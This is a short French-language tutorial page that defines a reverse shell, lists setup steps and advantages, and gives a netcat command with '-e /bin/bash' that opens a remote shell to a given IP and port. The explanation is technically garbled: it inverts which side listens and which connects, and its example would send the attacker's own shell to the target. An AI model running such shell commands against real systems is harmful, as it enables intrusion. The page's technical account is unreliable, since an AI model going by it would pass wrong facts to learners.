Reverse Shell
Qu'est-ce qu'un Reverse Shell ?
Un reverse shell est une technique de piratage où l'attaquant crée un serveur (généralement un shell) sur sa machine et le fait se connecter à la cible vulnérable via un port spécifié. Une fois la connexion établie, l'attaquant peut exécuter des commandes sur la machine cible et récupérer les résultats via la connexion réseau.
Étapes pour configurer un Reverse Shell :
Création du serveur : L'attaquant crée un serveur (ex. un shell) sur sa machine en écoutant sur un port spécifique.
Identification de la cible : L'attaquant identifie la cible vulnérable et son adresse IP pour établir la connexion.
Connexion à la cible : L'attaquant se connecte à la machine cible en spécifiant l'adresse IP et le port du serveur.
Contrôle de la cible : Une fois la connexion établie, l'attaquant peut exécuter des commandes sur la machine cible et récupérer les résultats via la connexion réseau.
Avantages du Reverse Shell :
Bypass des pare-feux sortants : Souvent, les pare-feux sont configurés pour autoriser les connexions sortantes, ce qui facilite l'utilisation d'un reverse shell.
Port-forwarding inutile : Contrairement au bind shell, l'attaquant n'a pas besoin de configurer le port-forwarding sur son routeur pour écouter les connexions entrantes.
Exemple d'utilisation de Reverse Shell : Supposons que l'attaquant ait créé un reverse shell sur sa machine, écoutant sur le port 4444, et que la cible vulnérable soit sur l'adresse IP 192.168.1.100 :
Attaquant (IP : 1.2.3.4) :
nc 192.168.1.100 4444 -e /bin/bash
Une fois que la connexion est établie, l'attaquant peut exécuter des commandes sur la machine cible et obtenir les résultats via la connexion réseau.
Last updated